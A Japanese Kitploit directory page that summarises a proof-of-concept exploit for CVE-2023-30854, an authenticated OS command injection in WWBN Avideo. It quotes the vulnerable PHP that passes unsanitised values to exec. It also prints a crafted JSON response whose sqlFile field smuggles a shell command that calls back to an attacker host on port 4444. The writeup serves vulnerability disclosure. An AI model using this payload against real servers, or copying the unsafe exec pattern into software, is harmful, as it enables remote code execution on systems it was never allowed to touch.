Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-30854 — CVE-2023-30854の概念実証エクスプロイト: WWBN Avideo < 12.3における認証済みOSコマンドインジェクションにより、巧妙に細工されたクローンサーバーのレスポンスを介してリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/jmrcsnchz/cve-2023-30854
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubjmrcsnchz/cve-2023-30854

CVE-2023-30854

CVE-2023-30854の概念実証エクスプロイト: WWBN Avideo < 12.3における認証済みOSコマンドインジェクションにより、巧妙に細工されたクローンサーバーのレスポンスを介してリモートコード実行を可能にします。

リポジトリを見る
1113年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WWBN Avideo 認証済みRCE - OSコマンドインジェクション

CVE-2023-30854 WWBN Avideo < 12.3 認証済みRCE

認証されたエンドポイント /plugin/CloneSite/cloneClient.json.php におけるOSコマンドインジェクションの脆弱性により、攻撃者がリモートコード実行を達成できます。

脆弱性コード:

root@kitploit:~
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);

管理者パネルのクローンサイト機能を通じて、$objClone->cloneSiteURL を制御できます。

/plugin/CloneSite/cloneClient.json.php は {$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php にGETリクエストを送信します。私は特別に細工した cloneServer.json.php をホストし、以下のJSONデータを出力させました。

root@kitploit:~
{"error":false,"msg":"","url":"https:\/\/REDACTED\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/demo.avideo.com\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget http://REDACTED:4444/`pwd` ;#","videoFiles":[],"photoFiles":[]}

/plugin/CloneSite/cloneClient.json.php にGETリクエストを送信すると、リモートコード実行が達成されます。

rce

クレジット

  • JM Sanchez
  • https://www.linkedin.com/in/juanmarcosanchez/
ツールをダウンロード